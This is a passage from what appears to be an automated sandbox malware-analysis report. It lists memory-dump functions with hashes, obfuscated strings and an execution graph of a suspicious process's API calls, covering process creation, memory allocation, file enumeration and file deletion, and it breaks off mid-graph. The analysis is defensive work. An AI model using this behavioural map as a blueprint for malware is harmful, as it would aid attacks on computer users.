                                                  • Opcode Fuzzy Hash: f660786144a0dcc073b6e3cdd037f0496482bee28493ab4739367fe7d3f80def
                                                  • Instruction Fuzzy Hash: E8111FB6D0121CAF8B00DFA9D8419EEB7F9FF48200F14456EE919E7240E7719A14CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66b926dc92124afd770d4fb538d12e6d1c9040ff0f8efd374a8c126eb438ebd8
                                                  • Instruction ID: 3c86e528b468d927fd212c81fda90e52426e061c976267587d5a3eaa69003456
                                                  • Opcode Fuzzy Hash: 66b926dc92124afd770d4fb538d12e6d1c9040ff0f8efd374a8c126eb438ebd8
                                                  • Instruction Fuzzy Hash: 000180B6214248BBCB44DF99DC80EEB77ADAF8D714F108609FA09E3240D630E8518BA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e9ef3e428d3292fef6c869e9766185cd0cca7d3c40a508152325a55f4f45e2b
                                                  • Instruction ID: 7f06e6cdc43e488b87580ad22726036f5627870db508507e2764f392b2f6cd9f
                                                  • Opcode Fuzzy Hash: 5e9ef3e428d3292fef6c869e9766185cd0cca7d3c40a508152325a55f4f45e2b
                                                  • Instruction Fuzzy Hash: CAF096BB1142566BD7105F6DEC44BCAFB9CEF85224F140266F95CCA242D671945287A0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65c45e4c7be51f0fd74b90ce967a54676480fc732c59fb5c884ddb3dc31b6b8e
                                                  • Instruction ID: 5a4f77e3002f5adbe5f37005d46fdd9ed6c19313f852d90d0f9fbe1d150a3f68
                                                  • Opcode Fuzzy Hash: 65c45e4c7be51f0fd74b90ce967a54676480fc732c59fb5c884ddb3dc31b6b8e
                                                  • Instruction Fuzzy Hash: 61F0F879200209BBCB10EE99DC41EAB77ADEF89714F108419FA1897241D670B9118BB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be7aa4d2da4b7067a596c9035d0bc30d2e7398eb739ff6c306a7e651a1f43883
                                                  • Instruction ID: cb28113d7902d757265700f9af99472d5bf898127cedc0e7dda1c5c66877de79
                                                  • Opcode Fuzzy Hash: be7aa4d2da4b7067a596c9035d0bc30d2e7398eb739ff6c306a7e651a1f43883
                                                  • Instruction Fuzzy Hash: F9F05E75805208ABDF28DF64D841BDDBBB4EF04320F108369E829DB280D63497548B81
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction ID: 57dc7407882084ab1e30cbb9c8500f60113c0bac5402715aa2929470fc90cca0
                                                  • Opcode Fuzzy Hash: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction Fuzzy Hash: 6EE06D792002487BDA14EE98DC84EEB77ADEF8A710F004809F909A7241D731B8118AB5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd79e2027c0dc6931a36b6f52d4c4b335389933d294c5190db9e905ddae655ce
                                                  • Instruction ID: 3a527ce25638762d10a78951747a6f32cd62b79638eb38de78d7f70956d7a965
                                                  • Opcode Fuzzy Hash: dd79e2027c0dc6931a36b6f52d4c4b335389933d294c5190db9e905ddae655ce
                                                  • Instruction Fuzzy Hash: 51E0203E60021033D920694D4C05F97735CDFD2F61F050024FE0DDB310D560ED0042E5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction ID: 35a229f7c9f9eda5496572c4560417c8bb01516c1f3bb16fe05af8040cd0bedb
                                                  • Opcode Fuzzy Hash: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction Fuzzy Hash: 79E08C3A2002447BDA20FB69CC41FEBB76DDFCA724F104819FA08A7241C771B9018BB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7215c5814a26de82221d08df1b2690ef9f4f7d0dda47b8b762d3890cb1fc3533
                                                  • Instruction ID: b5134148ac7c642373983c17d329a4f6568591d8ec01de2be165da1bf6710606
                                                  • Opcode Fuzzy Hash: 7215c5814a26de82221d08df1b2690ef9f4f7d0dda47b8b762d3890cb1fc3533
                                                  • Instruction Fuzzy Hash: F5C02230128282AFC208BB649D8059A7F52AD1223038C8768A830416C7CB11E444DA85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !&<!$"2:Y$"2As$"2Pg$'!&3$'<"2$)2|~$+;2S$2UF?$:^{|$;2Dw$< < $<!"$='!&$='!&<!"$>2~{$?|~)$B' #$EwpY$G)2S$XVC!$ZF_^$_}h{$`a{}$bb~w$gj)2$ts`{$wqy}$yw2U${f='${v2&${~v=$|=&<$|v`}$~~s=
                                                  • API String ID: 0-1593831861
                                                  • Opcode ID: 076e18da3ace8c9ac7fafb7f9e6c357d29f50696d592341abe2508bf67359a56
                                                  • Instruction ID: 14abc54b64b37cb7b06e40336ca0d9b1588dcc1958a981f7d9d65b2213b84830
                                                  • Opcode Fuzzy Hash: 076e18da3ace8c9ac7fafb7f9e6c357d29f50696d592341abe2508bf67359a56
                                                  • Instruction Fuzzy Hash: 293122F8C0128D9ECB24CFD2A9806ECBF74FB05749F20A689D599AF219C7350A52CF45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !4qu$#n%z$%(6 $(6/$+#i%$+#i%(6/$4quy$4yhh$72#i$7plu$`ut#$`ut4$htq{$i%(6$lqwv$lut3$l}`l$qwv7$q{yl$t4yh$tq{y$v7`p$v}|5$yhht$ylqw$ynq~$}7yh$}`{p$}zh4
                                                  • API String ID: 0-1934889098
                                                  • Opcode ID: 1adf374ee9bfa92e85af196db2bb5d14274175d134ca61b1da94abb1eb7353e1
                                                  • Instruction ID: 16daf21d63f81b0c67d2d8253090ad575d3c48c4de0ee5dfd33432c217f431fe
                                                  • Opcode Fuzzy Hash: 1adf374ee9bfa92e85af196db2bb5d14274175d134ca61b1da94abb1eb7353e1
                                                  • Instruction Fuzzy Hash: BA31BDF480525D9ACF10CF96D9806ECBB70BB41380F608589D458AF369CB348A45CF98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                  • API String ID: 0-392141074
                                                  • Opcode ID: 02163588b35888beab4c076595c29dbc6114d509aee734dec4e69a71d763ed80
                                                  • Instruction ID: 4c859b0a010082be75719372ffd7baf10ee286bb171422e2c66ecbf04d75138d
                                                  • Opcode Fuzzy Hash: 02163588b35888beab4c076595c29dbc6114d509aee734dec4e69a71d763ed80
                                                  • Instruction Fuzzy Hash: A7711FB9D10228BADF11DBA8CC41FEEB7BDBF44700F009199E519A7140E7B557488FA6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X$#$$g$)y$6f$7>$9$9z$I$OY$]'$_:$$
                                                  • API String ID: 0-1456910488
                                                  • Opcode ID: c7c7dd7464a81c34632dc1dd9ebaa7088e7afe2c67745ac96bcdebfc498242c2
                                                  • Instruction ID: 6913127579374ad1ef547f512e336ae6d88adb3d9fa453966e5b42f2461a15a9
                                                  • Opcode Fuzzy Hash: c7c7dd7464a81c34632dc1dd9ebaa7088e7afe2c67745ac96bcdebfc498242c2
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                  • API String ID: 0-685823316
                                                  • Opcode ID: ced497f3ce533af5a684df7f44c5983e9f8a72549f04d7e884d361f06516110f
                                                  • Instruction ID: 88467639c003a8a631c9b5dd336fef69b336a559a7dadbdf1977f6d11bfba952
                                                  • Opcode Fuzzy Hash: ced497f3ce533af5a684df7f44c5983e9f8a72549f04d7e884d361f06516110f
                                                  • Instruction Fuzzy Hash: BF3182B5D50218AAEF40DFA4CC85FEEB7B9BF48704F10815CE608BA180DBB556488FA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$P$e$i$m$o$r$x
                                                  • API String ID: 0-620024284
                                                  • Opcode ID: 275eb2a35851c2b2d2ff6bde86c843708b65954ca034c2815e23621209c52f17
                                                  • Instruction ID: 421db28f89b69b616700e7ffb9fb5e161896b8d799af0b72332cba74315fc82d
                                                  • Opcode Fuzzy Hash: 275eb2a35851c2b2d2ff6bde86c843708b65954ca034c2815e23621209c52f17
                                                  • Instruction Fuzzy Hash: 8141A3B9800258B6DF24EBA4CC40FEE737EAF45700F00859DA51DE7141EBB497488FA6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #i%($#i%(6!$6!$K4}v$}v5M
                                                  • API String ID: 0-4112245170
                                                  • Opcode ID: c48f379ebf9f63cdd6bfb563a200b61473c483006c760b803f05476a7bfa0e4b
                                                  • Instruction ID: 8b1503da0b704bca473e67565731f1dc393cc20129cb09f44250dcf838f8fa6b
                                                  • Opcode Fuzzy Hash: c48f379ebf9f63cdd6bfb563a200b61473c483006c760b803f05476a7bfa0e4b
                                                  • Instruction Fuzzy Hash: DCE0927880024CAACB04EFECC9416EEBB78EF01600F109D99C955DB241E7B486098BCA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$6$8$j
                                                  • API String ID: 0-3740571019
                                                  • Opcode ID: 0b81a56f67ac3607e86391d1168bf47dd35fb0feed04064ef4679e2814c08873
                                                  • Instruction ID: a71a4a0cb64e0fd9c37eaf019d94c68c87e4ede6a4166fc0ac44e9952d445539
                                                  • Opcode Fuzzy Hash: 0b81a56f67ac3607e86391d1168bf47dd35fb0feed04064ef4679e2814c08873
                                                  • Instruction Fuzzy Hash: 51314379D10119BBEF14DF94CD41BEEB7B9EF05304F004199EA09E7240EB71AA058BE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,$;r~<$;r~<,$^r~:;82?*;r~<,
                                                  • API String ID: 0-2352209933
                                                  • Opcode ID: dc9e75263e50324e87edf5a468dce56ea0ed5a5f93980bf753068a71ec0a6aa0
                                                  • Instruction ID: b4a50488662f1247521d66192e3e6f60ea5807d1aa059c12fb0e1f79426d7304
                                                  • Opcode Fuzzy Hash: dc9e75263e50324e87edf5a468dce56ea0ed5a5f93980bf753068a71ec0a6aa0
                                                  • Instruction Fuzzy Hash: 42F0E27491024CEACF04DFA4D884ADE7B74FF05300FA056A8D819AF201D37187598BA2

                                                  Execution Graph

                                                  Execution Coverage:2.6%
                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                  Signature Coverage:2.3%
                                                  Total number of Nodes:442
                                                  Total number of Limit Nodes:71
                                                  execution_graph 99093 2f19f30 99094 2f19f3f 99093->99094 99095 2f19f80 99094->99095 99096 2f19f6d CreateThread 99094->99096 99097 2f2a030 99098 2f2a046 99097->99098 99099 2f2a04b 99097->99099 99100 2f2a07d 99099->99100 99102 2f3ba20 99099->99102 99105 2f39ce0 99102->99105 99104 2f3ba39 99104->99100 99106 2f39cfa 99105->99106 99107 2f39d0b RtlFreeHeap 99106->99107 99107->99104 99108 2f2b170 99113 2f2ae80 99108->99113 99110 2f2b17d 99127 2f2aaf0 99110->99127 99112 2f2b199 99114 2f2aea5 99113->99114 99138 2f28780 99114->99138 99117 2f2aff0 99117->99110 99119 2f2b007 99119->99110 99120 2f2affe 99120->99119 99122 2f2b0f5 99120->99122 99157 2f2a540 99120->99157 99124 2f2b15a 99122->99124 99166 2f2a8b0 99122->99166 99125 2f3ba20 RtlFreeHeap 99124->99125 99126 2f2b161 99125->99126 99126->99110 99128 2f2ab06 99127->99128 99135 2f2ab11 99127->99135 99129 2f3bb00 RtlAllocateHeap 99128->99129 99129->99135 99130 2f2ab38 99130->99112 99131 2f28780 GetFileAttributesW 99131->99135 99132 2f2ae52 99133 2f2ae6b 99132->99133 99134 2f3ba20 RtlFreeHeap 99132->99134 99133->99112 99134->99133 99135->99130 99135->99131 99135->99132 99136 2f2a540 RtlFreeHeap 99135->99136 99137 2f2a8b0 RtlFreeHeap 99135->99137 99136->99135 99137->99135 99139 2f287a1 99138->99139 99140 2f287a8 GetFileAttributesW 99139->99140 99141 2f287b3 99139->99141 99140->99141 99141->99117 99142 2f337b0 99141->99142 99143 2f337be 99142->99143 99144 2f337c5 99142->99144 99143->99120 99170 2f24960 99144->99170 99147 2f33809 99153 2f339b7 99147->99153 99174 2f3bb00 99147->99174 99150 2f33822 99151 2f339ad 99150->99151 99150->99153 99154 2f3383e 99150->99154 99152 2f3ba20 RtlFreeHeap 99151->99152 99151->99153 99152->99153 99153->99120 99154->99153 99155 2f3ba20 RtlFreeHeap 99154->99155 99156 2f339a1 99155->99156 99156->99120 99158 2f2a566 99157->99158 99181 2f2df90 99158->99181 99160 2f2a5db 99162 2f2a760 99160->99162 99164 2f2a5f9 99160->99164 99161 2f2a745 99161->99120 99162->99161 99163 2f2a400 RtlFreeHeap 99162->99163 99163->99162 99164->99161 99186 2f2a400 99164->99186 99167 2f2a8d6 99166->99167 99168 2f2df90 RtlFreeHeap 99167->99168 99169 2f2a95d 99168->99169 99169->99122 99171 2f24984 99170->99171 99172 2f249c0 LdrLoadDll 99171->99172 99173 2f2498b 99171->99173 99172->99173 99173->99147 99177 2f33270 LdrLoadDll 99173->99177 99178 2f39c90 99174->99178 99176 2f3bb1b 99176->99150 99177->99147 99179 2f39cad 99178->99179 99180 2f39cbe RtlAllocateHeap 99179->99180 99180->99176 99183 2f2dfb4 99181->99183 99182 2f2dfc1 99182->99160 99183->99182 99184 2f3ba20 RtlFreeHeap 99183->99184 99185 2f2e004 99184->99185 99185->99160 99187 2f2a41d 99186->99187 99190 2f2e020 99187->99190 99189 2f2a523 99189->99164 99191 2f2e044 99190->99191 99192 2f2e0ee 99191->99192 99193 2f3ba20 RtlFreeHeap 99191->99193 99192->99189 99193->99192 99194 2f364f0 99195 2f3654a 99194->99195 99197 2f36557 99195->99197 99198 2f33ef0 99195->99198 99205 2f3b990 99198->99205 99200 2f33f31 99201 2f24960 LdrLoadDll 99200->99201 99204 2f3403e 99200->99204 99202 2f33f77 99201->99202 99203 2f33fc0 Sleep 99202->99203 99202->99204 99203->99202 99204->99197 99208 2f39ac0 99205->99208 99207 2f3b9c1 99207->99200 99209 2f39b58 99208->99209 99211 2f39aee 99208->99211 99210 2f39b6e NtAllocateVirtualMemory 99209->99210 99210->99207 99211->99207 99212 2f398b0 99213 2f398de 99212->99213 99214 2f3992a 99212->99214 99215 2f39940 NtDeleteFile 99214->99215 99216 2f38db0 99217 2f38e42 99216->99217 99218 2f38dde 99216->99218 99221 3a02ee0 LdrInitializeThunk 99217->99221 99219 2f38e73 99221->99219 99222 2f397b0 99223 2f3985a 99222->99223 99225 2f397de 99222->99225 99224 2f39870 NtReadFile 99223->99224 99226 2f38f30 99227 2f38f4d 99226->99227 99230 3a02df0 LdrInitializeThunk 99227->99230 99228 2f38f75 99230->99228 99231 2f28c37 99233 2f28c3a 99231->99233 99232 2f28bf1 99233->99232 99235 2f274c0 99233->99235 99236 2f274d6 99235->99236 99238 2f2750f 99235->99238 99236->99238 99239 2f27330 LdrLoadDll 99236->99239 99238->99232 99239->99238 99241 2f271a0 99242 2f271ca 99241->99242 99245 2f28340 99242->99245 99244 2f271f4 99246 2f2835d 99245->99246 99252 2f39070 99246->99252 99248 2f283ad 99249 2f283b4 99248->99249 99257 2f39150 99248->99257 99249->99244 99251 2f283dd 99251->99244 99253 2f3910e 99252->99253 99254 2f3909e 99252->99254 99262 3a02f30 LdrInitializeThunk 99253->99262 99254->99248 99255 2f39147 99255->99248 99258 2f39201 99257->99258 99260 2f3917f 99257->99260 99263 3a02d10 LdrInitializeThunk 99258->99263 99259 2f39246 99259->99251 99260->99251 99262->99255 99263->99259 99264 2f31f60 99265 2f31f79 99264->99265 99266 2f31fc1 99265->99266 99269 2f32004 99265->99269 99271 2f32009 99265->99271 99267 2f3ba20 RtlFreeHeap 99266->99267 99268 2f31fd1 99267->99268 99270 2f3ba20 RtlFreeHeap 99269->99270 99270->99271 99272 2f3b720 99273 2f3b72b 99272->99273 99274 2f3b74a 99273->99274 99276 2f35f70 99273->99276 99277 2f35fd2 99276->99277 99279 2f35fdf 99277->99279 99280 2f22710 99277->99280 99279->99274 99281 2f226ad 99280->99281 99282 2f226e6 99281->99282 99286 2f227a3 99281->99286 99287 2f38f80 99281->99287 99291 2f399f0 99282->99291 99285 2f226fb 99285->99279 99286->99279 99288 2f38f9a 99287->99288 99296 3a02c0a 99288->99296 99289 2f38fc6 99289->99282 99292 2f39a7f 99291->99292 99293 2f39a1b 99291->99293 99299 3a02e80 LdrInitializeThunk 99292->99299 99293->99285 99294 2f39ab0 99294->99285 99297 3a02c11 99296->99297 99298 3a02c1f LdrInitializeThunk 99296->99298 99297->99289 99298->99289 99299->99294 99300 2f1b8d0 99301 2f3b990 NtAllocateVirtualMemory 99300->99301 99302 2f1cf41 99301->99302 99303 2f19f90 99304 2f1a3ac 99303->99304 99306 2f1a974 99304->99306 99307 2f3b690 99304->99307 99308 2f3b6b3 99307->99308 99313 2f141d0 99308->99313 99310 2f3b6bf 99312 2f3b6f8 99310->99312 99316 2f35a80 99310->99316 99312->99306 99320 2f23610 99313->99320 99315 2f141dd 99315->99310 99317 2f35ae2 99316->99317 99319 2f35aef 99317->99319 99331 2f21dd0 99317->99331 99319->99312 99321 2f2362d 99320->99321 99323 2f23646 99321->99323 99324 2f3a3c0 99321->99324 99323->99315 99325 2f3a3da 99324->99325 99326 2f3a409 99325->99326 99327 2f38f80 LdrInitializeThunk 99325->99327 99326->99323 99328 2f3a469 99327->99328 99329 2f3ba20 RtlFreeHeap 99328->99329 99330 2f3a482 99329->99330 99330->99323 99332 2f21e0b 99331->99332 99347 2f282a0 99332->99347 99334 2f21e13 99335 2f220f3 99334->99335 99336 2f3bb00 RtlAllocateHeap 99334->99336 99335->99319 99337 2f21e29 99336->99337 99338 2f3bb00 RtlAllocateHeap 99337->99338 99339 2f21e3a 99338->99339 99340 2f3bb00 RtlAllocateHeap 99339->99340 99342 2f21e4b 99340->99342 99346 2f21eeb 99342->99346 99362 2f26e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99342->99362 99343 2f24960 LdrLoadDll 99344 2f220a2 99343->99344 99358 2f383c0 99344->99358 99346->99343 99348 2f282cc 99347->99348 99363 2f28190 99348->99363 99351 2f28311 99354 2f2832d 99351->99354 99356 2f39960 NtClose 99351->99356 99352 2f282f9 99355 2f28304 99352->99355 99369 2f39960 99352->99369 99354->99334 99355->99334 99357 2f28323 99356->99357 99357->99334 99359 2f38422 99358->99359 99360 2f3842f 99359->99360 99377 2f22110 99359->99377 99360->99335 99362->99346 99364 2f28286 99363->99364 99365 2f281aa 99363->99365 99364->99351 99364->99352 99372 2f39020 99365->99372 99368 2f39960 NtClose 99368->99364 99370 2f3997a 99369->99370 99371 2f3998b NtClose 99370->99371 99371->99355 99373 2f3903a 99372->99373 99376 3a035c0 LdrInitializeThunk 99373->99376 99374 2f2827a 99374->99368 99376->99374 99393 2f28570 99377->99393 99379 2f22696 99379->99360 99380 2f22130 99380->99379 99397 2f31590 99380->99397 99383 2f2234a 99405 2f3cbf0 99383->99405 99384 2f2218e 99384->99379 99400 2f3cac0 99384->99400 99387 2f2235f 99389 2f223ac 99387->99389 99411 2f20c30 99387->99411 99389->99379 99391 2f20c30 LdrInitializeThunk 99389->99391 99415 2f28510 99389->99415 99390 2f28510 LdrInitializeThunk 99392 2f22503 99390->99392 99391->99389 99392->99389 99392->99390 99394 2f2857d 99393->99394 99395 2f285a5 99394->99395 99396 2f2859e SetErrorMode 99394->99396 99395->99380 99396->99395 99398 2f3b990 NtAllocateVirtualMemory 99397->99398 99399 2f315b1 99398->99399 99399->99384 99401 2f3cad0 99400->99401 99402 2f3cad6 99400->99402 99401->99383 99403 2f3bb00 RtlAllocateHeap 99402->99403 99404 2f3cafc 99403->99404 99404->99383 99406 2f3cb60 99405->99406 99407 2f3cbbd 99406->99407 99408 2f3bb00 RtlAllocateHeap 99406->99408 99407->99387 99409 2f3cb9a 99408->99409 99410 2f3ba20 RtlFreeHeap 99409->99410 99410->99407 99412 2f20c4a 99411->99412 99419 2f39bf0 99412->99419 99416 2f28523 99415->99416 99424 2f38e80 99416->99424 99418 2f2854e 99418->99389 99420 2f39c0a 99419->99420 99423 3a02c70 LdrInitializeThunk 99420->99423 99421 2f20c52 99421->99392 99423->99421 99425 2f38efe 99424->99425 99426 2f38eab 99424->99426 99429 3a02dd0 LdrInitializeThunk 99425->99429 99426->99418 99427 2f38f23 99427->99418 99429->99427 99430 2f2ca10 99431 2f2ca39 99430->99431 99432 2f2cb3d 99431->99432 99433 2f2cae3 FindFirstFileW 99431->99433 99433->99432 99435 2f2cafe 99433->99435 99434 2f2cb24 FindNextFileW 99434->99435 99436 2f2cb36 FindClose 99434->99436 99435->99434 99436->99432 99437 2f25fd0 99438 2f28510 LdrInitializeThunk 99437->99438 99439 2f26000 99438->99439 99441 2f2602c 99439->99441 99442 2f28490 99439->99442 99443 2f284d4 99442->99443 99444 2f284f5 99443->99444 99449 2f38c50 99443->99449 99444->99439 99446 2f284e5 99447 2f28501 99446->99447 99448 2f39960 NtClose 99446->99448 99447->99439 99448->99444 99450 2f38ccd 99449->99450 99452 2f38c7b 99449->99452 99454 3a04650 LdrInitializeThunk 99450->99454 99451 2f38cf2 99451->99446 99452->99446 99454->99451 99455 2f21190 99456 2f211aa 99455->99456 99457 2f24960 LdrLoadDll 99456->99457 99458 2f211c8 99457->99458 99459 2f2120d 99458->99459 99460 2f211fc PostThreadMessageW 99458->99460 99460->99459 99466 2f31bd0 99467 2f31bec 99466->99467 99468 2f31c14 99467->99468 99469 2f31c28 99467->99469 99470 2f39960 NtClose 99468->99470 99471 2f39960 NtClose 99469->99471 99472 2f31c1d 99470->99472 99473 2f31c31 99471->99473 99476 2f3bb40 RtlAllocateHeap 99473->99476 99475 2f31c3c 99476->99475 99487 2f2779b 99488 2f2779f 99487->99488 99489 2f2776d 99487->99489 99490 2f27792 99489->99490 99492 2f2b6a0 99489->99492 99493 2f2b6c6 99492->99493 99494 2f2b8f9 99493->99494 99519 2f39d70 99493->99519 99494->99490 99496 2f2b73c 99496->99494 99497 2f3cbf0 2 API calls 99496->99497 99498 2f2b75b 99497->99498 99498->99494 99499 2f2b832 99498->99499 99500 2f38f80 LdrInitializeThunk 99498->99500 99501 2f25f50 LdrInitializeThunk 99499->99501 99503 2f2b851 99499->99503 99502 2f2b7bd 99500->99502 99501->99503 99502->99499 99505 2f2b7c6 99502->99505 99518 2f2b8e1 99503->99518 99525 2f38af0 99503->99525 99504 2f28510 LdrInitializeThunk 99506 2f2b828 99504->99506 99505->99494 99512 2f2b7f8 99505->99512 99514 2f2b81a 99505->99514 99522 2f25f50 99505->99522 99506->99490 99507 2f28510 LdrInitializeThunk 99511 2f2b8ef 99507->99511 99511->99490 99540 2f34c00 LdrInitializeThunk 99512->99540 99513 2f2b8b8 99530 2f38ba0 99513->99530 99514->99504 99516 2f2b8d2 99535 2f38d00 99516->99535 99518->99507 99520 2f39d8d 99519->99520 99521 2f39d9e CreateProcessInternalW 99520->99521 99521->99496 99523 2f39150 LdrInitializeThunk 99522->99523 99524 2f25f8e 99523->99524 99524->99512 99526 2f38b6d 99525->99526 99527 2f38b1b 99525->99527 99541 3a039b0 LdrInitializeThunk 99526->99541 99527->99513 99528 2f38b92 99528->99513 99531 2f38c20 99530->99531 99533 2f38bce 99530->99533 99542 3a04340 LdrInitializeThunk 99531->99542 99532 2f38c45 99532->99516 99533->99516 99536 2f38d80 99535->99536 99537 2f38d2e 99535->99537 99543 3a02fb0 LdrInitializeThunk 99536->99543 99537->99518 99538 2f38da5 99538->99518 99540->99514 99541->99528 99542->99532 99543->99538 99544 3a02ad0 LdrInitializeThunk 99545 2f2fc80 99546 2f2fce4 99545->99546 99574 2f266d0 99546->99574 99548 2f2fe1e 99549 2f2fe17 99549->99548 99581 2f267e0 99549->99581 99551 2f2fe9a 99552 2f2ffd2 99551->99552 99572 